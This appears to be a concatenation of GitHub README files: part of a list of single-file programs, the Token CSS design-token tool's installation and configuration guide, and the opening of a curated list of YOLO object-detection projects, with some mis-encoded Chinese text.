[2048](https://github.com/521xueweihan/OneFile/blob/main/src/html/2048.html) | HTML | The 2048 game | [Demo](https://hellogithub.com/onefile/demo/8d627fe4cfa540b19dcd04d4327cf26c.html) | | [ascii-cam](https://github.com/521xueweihan/OneFile/blob/main/src/html/ascii-cam.html) | HTML | Converts video frames into ASCII art | [Demo](https://hellogithub.com/onefile/demo/126093303b6b414dbab9d623c957fdd4.html) | | [looptap](https://github.com/vasanthv/looptap) | HTML | A little time-killer game: stop the ball inside the colored area | [Demo](https://hellogithub.com/onefile/demo/cc759276aefe4bad87ac259940042581.html) | | [the-super-tiny-compiler](https://github.com/jamiebuilds/the-super-tiny-compiler) | JavaScript | A tiny compiler that anyone can understand | [Source](https://hellogithub.com/onefile/code/b4c7642fae544a0f8e7bc8e4d9971d52) | | [pico](https://github.com/nenadmarkus/picojs) | JavaScript | A face-detection library implemented in 200 lines | [Source](https://hellogithub.com/onefile/code/2bcbe06dbcbb48078f2307379068e6e6) | | [parsedown](https://github.com/erusev/parsedown) | PHP | A small and beautiful Markdown parser library for PHP | [Source](https://hellogithub.com/onefile/code/12026fcae79e4cc08793246b5b55817a) | | [httpstat](https://github.com/reorx/httpstat) | Python | A command-line tool that presents curl results in a more elegant way | [Source](https://hellogithub.com/onefile/code/7c6847a33f1245608ae9abf4e59a03b8) | | [py2sec](https://github.com/cckuailong/py2sec) | Python | A lightweight, cross-platform script for "encrypting" and accelerating Python... | [Source](https://hellogithub.com/onefile/code/3e608cc323e84f15887461f1d3e71677) | | [tomato-clock](https://github.com/coolcode/tomato-clock) | Python | A command-line Pomodoro timer written in Python | [Source](https://hellogithub.com/onefile/code/05d586dfd389413da47ffdbc806196cc) | | [share](https://github.com/beavailable/share) | Python | An HTTP-based file-sharing tool | [Source](https://hellogithub.com/onefile/code/9b3c14d37aa5434182244de6ad947b97) | | [web-server](https://github.com/521xueweihan/OneFile/blob/main/src/python/web-server.py) | Python | A simple web framework | [Source](https://hellogithub.com/onefile/code/96c0137112cf4d15af8008f99d793a1a) | ## Roadmap - Add voting - Add prize money (to sponsor, please <a href="mailto:595666367@qq.com">contact me</a>) - English descriptions ## License <a rel="license" href="https://creativecommons.org/licenses/by-nc-nd/4.0/deed.zh"><img alt="Creative Commons License" style="border-width: 0" src="https://licensebuttons.net/l/by-nc-nd/4.0/88x31.png"></a><br>This work is licensed under a <a rel="license" href="https://creativecommons.org/licenses/by-nc-nd/4.0/deed.zh">Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International</a> license.
ๅชๆœ‰ไธ€ไธชๆ–‡ไปถ๏ผ
null
0
5
10
43
0
1
0
tokencss/tokencss
# Token CSS Token CSS is a new tool that seamlessly integrates [Design Tokens](https://design-tokens.github.io/community-group/format/#design-token) into your development workflow. Conceptually, it is similar to tools like [Tailwind](https://tailwindcss.com), [Styled System](https://styled-system.com/), and many CSS-in-JS libraries that provide tokenized _constraints_ for your styles&mdash;but there's one big difference. **Token CSS embraces `.css` files and `<style>` blocks.** ## Installation Building your site with [Astro](https://astro.build)? Use the official Astro integration. ```shell npm run astro add @tokencss/astro ``` Otherwise, install `@tokencss/postcss` and add it to your PostCSS configuration. ```shell npm install @tokencss/postcss ``` ```js const tokencss = require("@tokencss/postcss"); module.exports = { plugins: [tokencss()], }; ``` ## Configuration Create a `token.config.json` file in the root of your project&mdash;the `@tokencss/postcss` plugin will automatically pick this up. > **Warning**: It is intended that this file will follow the final [Design Tokens Format Module](https://design-tokens.github.io/community-group/format/), but we are currently following an older draft version of the spec. Expect breaking changes as we attempt to stay in sync with the latest version! You may either extend our built-in [Preset](https://github.com/tokencss/tokencss/blob/main/packages/core/preset/token.config.json)... ```json { "$schema": "https://tokencss.com/schema@0.0.1", "extends": ["@tokencss/core/preset"] } ``` Or create your own file from scratch. ```json { "$schema": "https://tokencss.com/schema@0.0.1", "extends": ["@tokencss/core"], "color": { "gray": { "0": { "value": "#f8f9fa" }, "1": { "value": "#f1f3f5" }, "2": { "value": "#e9ecef" }, "3": { "value": "#dee2e6" }, "4": { "value": "#ced4da" }, "5": { "value": "#adb5bd" }, "6": { "value": "#868e96" }, "7": { "value": "#495057" }, "8": { "value": "#343a40" }, "9": { "value": "#212529" } } }, "space": { "2xs": { "value": ".25rem" }, "xs": { "value": ".5rem" }, "sm": { "value": "1rem" }, "md": { "value": "1.25rem" }, "lg": { "value": "1.5rem" }, "xl": { "value": "1.75rem" }, "2xl": { "value": "2rem" }, "3xl": { "value": "3rem" }, "4xl": { "value": "4rem" }, "5xl": { "value": "5rem" }, "6xl": { "value": "7.5rem" }, "7xl": { "value": "10rem" }, "8xl": { "value": "15rem" }, "9xl": { "value": "20rem" }, "10xl": { "value": "30rem" } }, "size": { "full": { "value": "100%" }, "2xs": { "value": ".25rem" }, "xs": { "value": ".5rem" }, "sm": { "value": "1rem" }, "md": { "value": "1.25rem" }, "lg": { "value": "1.5rem" }, "xl": { "value": "1.75rem" }, "2xl": { "value": "2rem" }, "3xl": { "value": "3rem" }, "4xl": { "value": "4rem" }, "5xl": { "value": "5rem" }, "6xl": { "value": "7.5rem" }, "7xl": { "value": "10rem" }, "8xl": { "value": "15rem" }, "9xl": { "value": "20rem" }, "10xl": { "value": "30rem" } }, "width": { "screen": { "value": "100vw" } }, "height": { "screen": { "value": "100vh" } }, "radius": { "none": { "value": "0px" }, "sm": { "value": "0.125rem" }, "default": { "value": "0.25rem" }, "md": { "value": "0.375rem" }, "lg": { "value": "0.5rem" }, "xl": { "value": "0.75rem" }, "2xl": { "value": "1rem" }, "3xl": { "value": "1.5rem" }, "full": { "value": "9999px" } }, "shadow": { "default": { "value": [ { "offset-x": "0px", "offset-y": "1px", "blur": "3px", "spread": "0px", "color": "#000", "opacity": 0.1 }, { "offset-x": "0px", "offset-y": "1px", "blur": "2px", "spread": "-1px", "color": "#000", "opacity": 0.1 } ] } }, "font": { 
"sans": { "value": [ "system-ui", "-apple-system", "Segoe UI", "Roboto", "Ubuntu", "Cantarell", "Noto Sans", "sans-serif" ] } }, "font-size": { "xs": { "value": "0.75rem" }, "sm": { "value": "0.875rem" }, "default": { "value": "1rem" }, "lg": { "value": "1.125rem" }, "xl": { "value": "1.25rem" }, "2xl": { "value": "1.5rem" }, "3xl": { "value": "1.875rem" }, "4xl": { "value": "2.25rem" }, "5xl": { "value": "3rem" }, "6xl": { "value": "3.75rem" }, "7xl": { "value": "4.5rem" }, "8xl": { "value": "6rem" }, "9xl": { "value": "8rem" } }, "font-weight": { "thin": { "value": 100 }, "extralight": { "value": 200 }, "light": { "value": 300 }, "normal": { "value": 400 }, "medium": { "value": 500 }, "semibold": { "value": 600 }, "bold": { "value": 700 }, "extrabold": { "value": 800 }, "black": { "value": 900 } }, "line-height": { "none": { "value": 1 }, "tight": { "value": 1.25 }, "snug": { "value": 1.375 }, "normal": { "value": 1.5 }, "relaxed": { "value": 1.625 }, "loose": { "value": 2 } }, "letter-spacing": { "tighter": { "value": "-0.05em" }, "tight": { "value": "-0.025em" }, "normal": { "value": "0em" }, "wide": { "value": "0.025em" }, "wider": { "value": "0.05em" }, "widest": { "value": "0.1em" } }, "easing": { "cubic": { "in": { "value": [0.32, 0, 0.67, 0] }, "out": { "value": [0.33, 1, 0.68, 1] }, "in-out": { "value": [0.65, 0, 0.35, 1] } } } } ``` ## Setup > **Note:** Using Astro? You can skip this step! Token variables are automatically injected by the integration. If you are using our plain PostCSS setup, you should include the following line in the root of your stylesheet. This will inject `--custom-property` declarations for all of your tokens. ```css @inject "tokencss:base"; ``` ## Usage You're ready to use tokens in your CSS! ```css .box { background: red.5; border-radius: md; width: lg; height: lg; /* Custom Properties are also supported! */ --color: blue.6; --margin: sm; } ``` ## Editor integration Be sure to install our [Visual Studio Code](https://marketplace.visualstudio.com/items?itemName=tokencss.tokencss-vscode) extension for the best experience.
null
null
13
1
9
66
19
3
1
codingonion/awesome-yolo-object-detection
# Awesome-YOLO-Object-Detection [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome) 🚀🚀🚀 YOLO is a great real-time one-stage object detection framework. This repository lists some awesome public YOLO object detection series projects. ## Contents - [Awesome-YOLO-Object-Detection](#awesome-yolo-object-detection) - [Summary](#summary) - [Official YOLO](#official-yolo) - [Awesome List](#awesome-list) - [Paper and Code Overview](#paper-and-code-overview) - [Paper Review](#paper-review) - [Code Review](#code-review) - [Learning Resources](#learning-resources) - [Extensional Frameworks](#extensional-frameworks) - [Other Versions of YOLO](#other-versions-of-yolo) - [PyTorch Implementation](#pytorch-implementation) - [C Implementation](#c-implementation) - [CPP Implementation](#cpp-implementation) - [ROS Implementation](#ros-implementation) - [Mojo Implementation](#mojo-implementation) - [Rust Implementation](#rust-implementation) - [Go Implementation](#go-implementation) - [CSharp Implementation](#csharp-implementation) - [Tensorflow and Keras Implementation](#tensorflow-and-keras-implementation) - [PaddlePaddle Implementation](#paddlepaddle-implementation) - [Caffe Implementation](#caffe-implementation) - [MXNet Implementation](#mxnet-implementation) - [Web Implementation](#web-implementation) - [Others](#others) - [Lighter and Deployment Frameworks](#lighter-and-deployment-frameworks) - [Lightweight Backbones and FPN](#lightweight-backbones-and-fpn) - [Pruning Knowledge-Distillation Quantization](#pruning-knoweldge-distillation-quantization) - [Pruning](#pruning) - [Quantization](#quantization) - [Knowledge-Distillation](#knoweldge-distillation) - [High-performance Inference Engine](#high-performance-inference-engine) - [ONNX](#onnx) - [TensorRT](#tensorrt) - [OpenVINO](#openvino) - [NCNN](#ncnn) - [MNN](#mnn) - [DeepStream](#deepstream) - [Other Engine](#other-engine) - [FPGA TPU NPU Hardware Deployment](#fpga-tpu-npu-hardware-deployment) - [FPGA](#fpga) - [Other Hardware](#other-hardware) - [Applications](#applications) - [Video Object Detection](#video-object-detection) - [Object Tracking](#object-tracking) - [Multi-Object Tracking](#multi-object-tracking) - [Dynamic Object Tracking](#dynamic-object-tracking) - [Deep Reinforcement Learning](#deep-reinforcement-learning) - [Motion Control Field](#motion-control-field) - [Super-Resolution Field](#super-resolution-field) - [Spiking Neural Network](#spiking-neural-network) - [Attention and Transformer](#attention-and-transformer) - [Small Object Detection](#small-object-detection) - [Few-shot Object Detection](#few-shot-object-detection) - [Open World Object Detection](#open-world-object-detection) - [Oriented Object Detection](#oriented-object-detection) - [Face Detection and Recognition](#face-detection-and-recognition) - [Face Detection](#face-detection) - [Face Recognition](#face-recognition) - [Face Mask Detection](#face-mask-detection) - [Social Distance Detection](#social-distance-detection) - [Autonomous Driving Field Detection](#autonomous-driving-field-detection) - [Vehicle Detection](#vehicle-detection) - [License Plate Detection and Recognition](#license-plate-detection-and-recognition) - [Lane Detection](#lane-detection) - [Driving Behavior Detection](#driving-behavior-detection) - [Parking Slot Detection](#parking-slot-detection) - [Traffic Light Detection](#traffic-light-detection) - [Traffic Sign 
Detection](#traffic-sign-detection) - [Crosswalk Detection](#crosswalk-detection) - [Traffic Accidents Detection](#traffic-accidents-detection) - [Road Damage Detection](#road-damage-detection) - [Animal Detection](#animal-detection) - [Helmet Detection](#helmet-detection) - [Hand Detection](#hand-detection) - [Gesture Recognition](#gesture-recognition) - [Action Detection](#action-detection) - [Emotion Recognition](#emotion-recognition) - [Human Pose Estimation](#human-pose-estimation) - [Distance Measurement](#distance-measurement) - [Instance and Semantic Segmentation](#instance-and-semantic-segmentation) - [3D Object Detection](#3d-object-detection) - [SLAM Field Detection](#slam-field-detection) - [Industrial Defect Detection](#industrial-defect-detection) - [SAR Image Detection](#sar-image-detection) - [Multispectral Image Fusion Detection](#multispectral-image-fusion-detection) - [Safety Monitoring Field Detection](#safety-monitoring-field-detection) - [Medical Field Detection](#medical-field-detection) - [Chemistry Field Detection](#chemistry-field-detection) - [Agricultural Field Detection](#agricultural-field-detection) - [Sports Field Detection](#sports-field-detection) - [Adverse Weather Conditions](#adverse-weather-conditions) - [Adversarial Attack and Defense](#adversarial-attack-and-defense) - [Game Field Detection](#game-field-detection) - [Automatic Annotation Tools](#automatic-annotation-tools) - [Feature Map Visualization](#feature-map-visualization) - [Object Detection Evaluation Metrics](#object-detection-evaluation-metrics) - [GUI](#gui) - [Streamlit-Related](#streamlit-related) - [Gradio-Related](#gradio-related) - [QT-Related](#qt-related) - [PySide-Related](#pyside-related) - [Flutter-Related](#flutter-related) - [Slint-Related](#slint-related) - [Other Applications](#other-applications) - [Blogs](#blogs) - [Videos](#videos) ## Summary - ### Official YOLO - [YOLOv1](https://pjreddie.com/darknet/yolov1) ([Darknet](https://github.com/pjreddie/darknet) <img src="https://img.shields.io/github/stars/pjreddie/darknet?style=social"/>) : "You Only Look Once: Unified, Real-Time Object Detection". (**[CVPR 2016](https://www.cv-foundation.org/openaccess/content_cvpr_2016/html/Redmon_You_Only_Look_CVPR_2016_paper.html)**) - [YOLOv2](https://pjreddie.com/darknet/yolov2) ([Darknet](https://github.com/pjreddie/darknet) <img src="https://img.shields.io/github/stars/pjreddie/darknet?style=social"/>) : "YOLO9000: Better, Faster, Stronger". (**[CVPR 2017](https://openaccess.thecvf.com/content_cvpr_2017/html/Redmon_YOLO9000_Better_Faster_CVPR_2017_paper.html)**) - [YOLOv3](https://pjreddie.com/darknet/yolo) ([Darknet](https://github.com/pjreddie/darknet) <img src="https://img.shields.io/github/stars/pjreddie/darknet?style=social"/>) : "YOLOv3: An Incremental Improvement". (**[arXiv 2018](https://arxiv.org/abs/1804.02767)**) - [YOLOv4](https://github.com/AlexeyAB/darknet) <img src="https://img.shields.io/github/stars/AlexeyAB/darknet?style=social"/> ([WongKinYiu/PyTorch_YOLOv4](https://github.com/WongKinYiu/PyTorch_YOLOv4) <img src="https://img.shields.io/github/stars/WongKinYiu/PyTorch_YOLOv4?style=social"/>) : "YOLOv4: Optimal Speed and Accuracy of Object Detection". 
(**[arXiv 2020](https://arxiv.org/abs/2004.10934)**) - [Scaled-YOLOv4](https://github.com/AlexeyAB/darknet) <img src="https://img.shields.io/github/stars/AlexeyAB/darknet?style=social"/> ([WongKinYiu/ScaledYOLOv4](https://github.com/WongKinYiu/ScaledYOLOv4) <img src="https://img.shields.io/github/stars/WongKinYiu/ScaledYOLOv4?style=social"/>) : "Scaled-YOLOv4: Scaling Cross Stage Partial Network". (**[CVPR 2021](https://openaccess.thecvf.com/content/CVPR2021/html/Wang_Scaled-YOLOv4_Scaling_Cross_Stage_Partial_Network_CVPR_2021_paper.html)**) - [YOLOv5](https://github.com/ultralytics/yolov5) <img src="https://img.shields.io/github/stars/ultralytics/yolov5?style=social"/> : YOLOv5 🚀 in PyTorch > ONNX > CoreML > TFLite. [docs.ultralytics.com](https://docs.ultralytics.com/). YOLOv5 🚀 is the world's most loved vision AI, representing [Ultralytics](https://ultralytics.com/) open-source research into future vision AI methods, incorporating lessons learned and best practices evolved over thousands of hours of research and development. - [YOLOX](https://github.com/Megvii-BaseDetection/YOLOX) <img src="https://img.shields.io/github/stars/Megvii-BaseDetection/YOLOX?style=social"/> : "YOLOX: Exceeding YOLO Series in 2021". (**[arXiv 2021](https://arxiv.org/abs/2107.08430)**) - [YOLOR](https://github.com/WongKinYiu/yolor) <img src="https://img.shields.io/github/stars/WongKinYiu/yolor?style=social"/> : "You Only Learn One Representation: Unified Network for Multiple Tasks". (**[arXiv 2021](https://arxiv.org/abs/2105.04206)**) - [YOLOF](https://github.com/megvii-model/YOLOF) <img src="https://img.shields.io/github/stars/megvii-model/YOLOF?style=social"/> : "You Only Look One-level Feature". (**[CVPR 2021](https://openaccess.thecvf.com/content/CVPR2021/html/Chen_You_Only_Look_One-Level_Feature_CVPR_2021_paper.html)**). WeChat official account 「计算机视觉研究院」: "[A new CVPR object detection framework: not another YOLO, but just one level of feature (packed with insights, worth bookmarking)](https://mp.weixin.qq.com/s/5sTxdjhKIPpQ-rCsWfe80A)". - [YOLOS](https://github.com/hustvl/YOLOS) <img src="https://img.shields.io/github/stars/hustvl/YOLOS?style=social"/> : "You Only Look at One Sequence: Rethinking Transformer in Vision through Object Detection". (**[NeurIPS 2021](https://proceedings.neurips.cc//paper/2021/hash/dc912a253d1e9ba40e2c597ed2376640-Abstract.html)**) - [YOLOv6](https://github.com/meituan/YOLOv6) <img src="https://img.shields.io/github/stars/meituan/YOLOv6?style=social"/> : "YOLOv6: A Single-Stage Object Detection Framework for Industrial Applications". (**[arXiv 2022](https://arxiv.org/abs/2209.02976)**). 
"ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ็พŽๅ›ขๆŠ€ๆœฏๅ›ข้˜Ÿใ€ใ€Š[YOLOv6๏ผšๅˆๅฟซๅˆๅ‡†็š„็›ฎๆ ‡ๆฃ€ๆต‹ๆก†ๆžถๅผ€ๆบๅ•ฆ](https://mp.weixin.qq.com/s/RrQCP4pTSwpTmSgvly9evg)ใ€‹"ใ€‚"ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ็พŽๅ›ขๆŠ€ๆœฏๅ›ข้˜Ÿใ€ใ€Š[็›ฎๆ ‡ๆฃ€ๆต‹ๅผ€ๆบๆก†ๆžถYOLOv6ๅ…จ้ขๅ‡็บง๏ผŒๆ›ดๅฟซๆ›ดๅ‡†็š„2.0็‰ˆๆœฌๆฅๅ•ฆ](https://mp.weixin.qq.com/s/9FyvWrHErfgJrVXIC_PKqg)ใ€‹"ใ€‚"ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ็พŽๅ›ขๆŠ€ๆœฏๅ›ข้˜Ÿใ€ใ€Š[้€š็”จ็›ฎๆ ‡ๆฃ€ๆต‹ๅผ€ๆบๆก†ๆžถYOLOv6ๅœจ็พŽๅ›ข็š„้‡ๅŒ–้ƒจ็ฝฒๅฎžๆˆ˜ ](https://mp.weixin.qq.com/s/J-3saNkCCAHLjkZQ3VCaeQ)ใ€‹"ใ€‚ "ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ้›†ๆ™บไนฆ็ซฅใ€ใ€Š[่ถ…่ถŠYOLOv7 | YOLOv6่ฎบๆ–‡ๆ”พๅ‡บ๏ผŒ้‡ๅ‚+่‡ช่’ธ้ฆ+ๆ„Ÿ็Ÿฅ้‡ๅŒ–+...ๅ„็งTricksๅคงๆ”พๅผ‚ๅฝฉ](https://mp.weixin.qq.com/s/DPHC7bO1Q-IKDUqPU7DSJA)ใ€‹"ใ€‚"ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œๆžๅธ‚ๅนณๅฐใ€ใ€Š[Repvgg-style ConvNets๏ผŒ็กฌไปถๅ‹ๅฅฝ๏ผ่ฏฆ่งฃYOLOv6็š„้ซ˜ๆ•ˆbackbone๏ผšEfficientRep](https://mp.weixin.qq.com/s/2Md30QdqgWnWwVR7d4sx1Q)ใ€‹"ใ€‚ - [YOLOv7](https://github.com/WongKinYiu/yolov7) <img src="https://img.shields.io/github/stars/WongKinYiu/yolov7?style=social"/> : "YOLOv7: Trainable bag-of-freebies sets new state-of-the-art for real-time object detectors". (**[CVPR 2023](https://arxiv.org/abs/2207.02696)**). "ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒCVerใ€ใ€Š[CVPR 2023 | YOLOv7ๅผบๅŠฟๆ”ถๅฝ•๏ผๆ—ถ้š”6ๅนด๏ผŒYOLOv็ณปๅˆ—ๅ†็™ปCVPR๏ผ](https://mp.weixin.qq.com/s/HjaszZYPLoV03Z4Rw9KiCg)ใ€‹"ใ€‚ - [DAMO-YOLO](https://github.com/tinyvision/DAMO-YOLO) <img src="https://img.shields.io/github/stars/tinyvision/DAMO-YOLO?style=social"/> : DAMO-YOLO: a fast and accurate object detection method with some new techs, including NAS backbones, efficient RepGFPN, ZeroHead, AlignedOTA, and distillation enhancement. "DAMO-YOLO : A Report on Real-Time Object Detection Design". (**[arXiv 2022](https://arxiv.org/abs/2211.15444)**) - [DynamicDet](https://github.com/VDIGPKU/DynamicDet) <img src="https://img.shields.io/github/stars/VDIGPKU/DynamicDet?style=social"/> : "DynamicDet: A Unified Dynamic Architecture for Object Detection". (**[CVPR 2023](https://arxiv.org/abs/2304.05552)**) - [EdgeYOLO](https://github.com/LSH9832/edgeyolo) <img src="https://img.shields.io/github/stars/LSH9832/edgeyolo?style=social"/> : EdgeYOLO: anchor-free, edge-friendly. an edge-real-time anchor-free object detector with decent performance. "Edge YOLO: Real-time intelligent object detection system based on edge-cloud cooperation in autonomous vehicles". (**[IEEE Transactions on Intelligent Transportation Systems, 2022](https://ieeexplore.ieee.org/abstract/document/9740044)**). "EdgeYOLO: An Edge-Real-Time Object Detector". (**[arXiv 2023](https://arxiv.org/abs/2302.07483)**) - [RT-DETR](https://github.com/PaddlePaddle/PaddleDetection/tree/develop/configs/rtdetr) <img src="https://img.shields.io/github/stars/PaddlePaddle/PaddleDetection?style=social"/> : "DETRs Beat YOLOs on Real-time Object Detection". (**[arXiv 2023](https://arxiv.org/abs/2304.08069)**). "ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ้›†ๆ™บไนฆ็ซฅใ€ใ€Š[YOLO่ถ…ๅฟซๆ—ถไปฃ็ปˆ็ป“ไบ† | RT-DETR็”จ114FPSๅฎž็Žฐ54.8AP๏ผŒ่ฟœ่ถ…YOLOv8](https://mp.weixin.qq.com/s/V3MUXinJhpq8J4UWTUL17w)ใ€‹"ใ€‚ - [YOLO-NAS](https://github.com/Deci-AI/super-gradients) <img src="https://img.shields.io/github/stars/Deci-AI/super-gradients?style=social"/> : Easily train or fine-tune SOTA computer vision models with one open source training library. The home of [Yolo-NAS](https://github.com/Deci-AI/super-gradients/blob/master/YOLONAS.md). [www.supergradients.com](https://www.supergradients.com/). YOLO-NAS: A Next-Generation, Object Detection Foundational Model generated by Deciโ€™s Neural Architecture Search Technology. 
Deci is thrilled to announce the release of a new object detection model, YOLO-NAS - a game-changer in the world of object detection, providing superior real-time object detection capabilities and production-ready performance. Deci's mission is to provide AI teams with tools to remove development barriers and attain efficient inference performance more quickly. The new YOLO-NAS delivers state-of-the-art (SOTA) performance with the unparalleled accuracy-speed performance, outperforming other models such as YOLOv5, YOLOv6, YOLOv7 and YOLOv8. - [YOLO-World](https://github.com/AILab-CVC/YOLO-World) <img src="https://img.shields.io/github/stars/AILab-CVC/YOLO-World?style=social"/> : "YOLO-World: Real-Time Open-Vocabulary Object Detection". (**[CVPR 2024](https://arxiv.org/abs/2401.17270)**). [www.yoloworld.cc](https://www.yoloworld.cc/) - [YOLOv8](https://github.com/ultralytics/ultralytics) <img src="https://img.shields.io/github/stars/ultralytics/ultralytics?style=social"/> : NEW - YOLOv8 ๐Ÿš€ in PyTorch > ONNX > CoreML > TFLite. [Ultralytics](https://ultralytics.com/) [YOLOv8](https://github.com/ultralytics/ultralytics) is a cutting-edge, state-of-the-art (SOTA) model that builds upon the success of previous YOLO versions and introduces new features and improvements to further boost performance and flexibility. YOLOv8 is designed to be fast, accurate, and easy to use, making it an excellent choice for a wide range of object detection and tracking, instance segmentation, image classification and pose estimation tasks. [docs.ultralytics.com](https://docs.ultralytics.com/) - [YOLOv9](https://github.com/WongKinYiu/yolov9) <img src="https://img.shields.io/github/stars/WongKinYiu/yolov9?style=social"/> : "YOLOv9: Learning What You Want to Learn Using Programmable Gradient Information". (**[arXiv 2024](https://arxiv.org/abs/2402.13616)**) - [YOLOv10](https://github.com/THU-MIG/yolov10) <img src="https://img.shields.io/github/stars/THU-MIG/yolov10?style=social"/> : "YOLOv10: Real-Time End-to-End Object Detection". (**[arXiv 2024](https://arxiv.org/abs/2405.14458v1)**) - [LeYOLO](https://github.com/LilianHollard/LeYOLO) <img src="https://img.shields.io/github/stars/LilianHollard/LeYOLO?style=social"/> : "LeYOLO, New Scalable and Efficient CNN Architecture for Object Detection". (**[arXiv 2024](https://arxiv.org/abs/2406.14239)**) - ### Awesome List - [awesome-yolo-object-detection](https://github.com/codingonion/awesome-yolo-object-detection) <img src="https://img.shields.io/github/stars/codingonion/awesome-yolo-object-detection?style=social"/> : ๐Ÿš€๐Ÿš€๐Ÿš€ A collection of some awesome YOLO object detection series projects. - [srebroa/awesome-yolo](https://github.com/srebroa/awesome-yolo) <img src="https://img.shields.io/github/stars/srebroa/awesome-yolo?style=social"/> : ๐Ÿš€ โญ The list of the most popular YOLO algorithms - awesome YOLO. - [Bubble-water/YOLO-Summary](https://github.com/Bubble-water/YOLO-Summary) <img src="https://img.shields.io/github/stars/Bubble-water/YOLO-Summary?style=social"/> : YOLO-Summary. - [WZMIAOMIAO/deep-learning-for-image-processing](https://github.com/WZMIAOMIAO/deep-learning-for-image-processing) <img src="https://img.shields.io/github/stars/WZMIAOMIAO/deep-learning-for-image-processing?style=social"/> : deep learning for image processing including classification and object-detection etc. 
- [hoya012/deep_learning_object_detection](https://github.com/hoya012/deep_learning_object_detection) <img src="https://img.shields.io/github/stars/hoya012/deep_learning_object_detection?style=social"/> : A paper list of object detection using deep learning. - [amusi/awesome-object-detection](https://github.com/amusi/awesome-object-detection) <img src="https://img.shields.io/github/stars/amusi/awesome-object-detection?style=social"/> : Awesome Object Detection. - ### Paper and Code Overview - #### Paper Review - [52CV/CV-Surveys](https://github.com/52CV/CV-Surveys) <img src="https://img.shields.io/github/stars/52CV/CV-Surveys?style=social"/> : Surveys related to computer vision, including object detection, tracking and more. - [GreenTeaHua/YOLO-Review](https://github.com/GreenTeaHua/YOLO-Review) <img src="https://img.shields.io/github/stars/GreenTeaHua/YOLO-Review?style=social"/> : "A Review of YOLO Object Detection Based on Deep Learning". "基于深度学习的YOLO目标检测综述". (**[Journal of Electronics & Information Technology 2022](https://jeit.ac.cn/cn/article/doi/10.11999/JEIT210790)**) - "A Review of Yolo Algorithm Developments". (**[Procedia Computer Science 2022](https://www.sciencedirect.com/science/article/pii/S1877050922001363)**) - #### Code Review - [MMDetection](https://github.com/open-mmlab/mmdetection) <img src="https://img.shields.io/github/stars/open-mmlab/mmdetection?style=social"/> : OpenMMLab Detection Toolbox and Benchmark. [mmdetection.readthedocs.io](https://mmdetection.readthedocs.io/en/latest/). (**[arXiv 2019](https://arxiv.org/abs/1906.07155)**) - [MMYOLO](https://github.com/open-mmlab/mmyolo) <img src="https://img.shields.io/github/stars/open-mmlab/mmyolo?style=social"/> : OpenMMLab YOLO series toolbox and benchmark. Implemented RTMDet, RTMDet-Rotated, YOLOv5, YOLOv6, YOLOv7, YOLOv8, YOLOX, PPYOLOE, etc. [mmyolo.readthedocs.io/zh_CN/dev/](https://mmyolo.readthedocs.io/zh_CN/dev/) - [ultralyticsPro](https://github.com/iscyy/ultralyticsPro) <img src="https://img.shields.io/github/stars/iscyy/ultralyticsPro?style=social"/> : 🔥🔥🔥 Focused on improving the YOLOv8 model. NEW - YOLOv8 🚀 RT-DETR 🥇 in PyTorch >, Support to improve backbone, neck, head, loss, IoU, NMS and other modules🚀 - [YOLOAir](https://github.com/iscyy/yoloair) <img src="https://img.shields.io/github/stars/iscyy/yoloair?style=social"/> : YOLO Air : Makes improvements easy again. 🔥🔥🔥YOLOv5, YOLOv6, YOLOv7, YOLOv8, PPYOLOE, YOLOX, YOLOR, YOLOv4, YOLOv3, Transformer, Attention, TOOD and Improved-YOLOv5-YOLOv7... Support to improve backbone, neck, head, loss, IoU, NMS and other modules🚀. YOLOAir is a PyTorch-based YOLO algorithm library: a unified model code framework, unified application, unified improvements, easy module composition, for building more powerful network models. WeChat official account 「FightingCV」: "[YOLOAir | An object detection library for beginners: a faster, more convenient and more complete YOLO library](https://mp.weixin.qq.com/s/smwx-Ievs3rWMw_D4lSwqg)". WeChat official account 「我爱计算机视觉」: "[YOLOAir, a YOLO detection codebase for beginner researchers that integrates many YOLO improvements](https://mp.weixin.qq.com/s/EEJrnfnTn7wAcEpVPx06BQ)" - [YOLOAir2](https://github.com/iscyy/yoloair2) <img src="https://img.shields.io/github/stars/iscyy/yoloair2?style=social"/> : YOLOAir2☁️💡🎈 : Makes improvements easy again. ☁️💡🎈YOLOAir2 is the second version of the YOLOAir series. The framework is based on YOLOv7, including YOLOv7, YOLOv8, YOLOv6, YOLOv5, YOLOX, YOLOR, YOLOv4, YOLOv3, Transformer, Attention and Improved-YOLOv7... 
Support to improve Backbone, Neck, Head, Loss, IoU, NMS and other modules. - [YOLOU](https://github.com/jizhishutong/YOLOU) <img src="https://img.shields.io/github/stars/jizhishutong/YOLOU?style=social"/> : YOLOU: United, Study and easier to Deploy. The purpose of our creation of YOLOU is to better learn the algorithms of the YOLO series and pay tribute to our predecessors. YOLOv3, YOLOv4, YOLOv5, YOLOv5-Lite, YOLOv6-v1, YOLOv6-v2, YOLOv7, YOLOX, YOLOX-Lite, PP-YOLOE, PP-PicoDet-Plus, YOLO-Fastest v2, FastestDet, YOLOv5-SPD, TensorRT, NCNN, Tengine, OpenVINO. WeChat official account 「集智书童」: "[YOLOU open-sourced | All YOLO-series algorithms in one place: algorithm learning, research improvements and deployment, all in one!](https://mp.weixin.qq.com/s/clupheQ8iHnhR4FJcTtB8A)" - [YOLOMagic](https://github.com/WangQvQ/Yolov5_Magic) <img src="https://img.shields.io/github/stars/WangQvQ/Yolov5_Magic?style=social"/> : YOLO Magic🪄 is an extension based on Ultralytics' YOLOv5, designed to provide more powerful functionality and simpler operations for visual tasks. - [positive666/yolo_research](https://github.com/positive666/yolo_research) <img src="https://img.shields.io/github/stars/positive666/yolo_research?style=social"/> : 🚀 yolo_research PLUS High-level, based on the yolo-high-level project (detect\pose\classify\segment\): includes yolov5\yolov7\yolov8\ core, improvement research, SwintransformV2 and Attention Series; training skills, business customization, engineering deployment. - [augmentedstartups/AS-One](https://github.com/augmentedstartups/AS-One) <img src="https://img.shields.io/github/stars/augmentedstartups/AS-One?style=social"/> : Easy & Modular Computer Vision Detectors and Trackers - Run 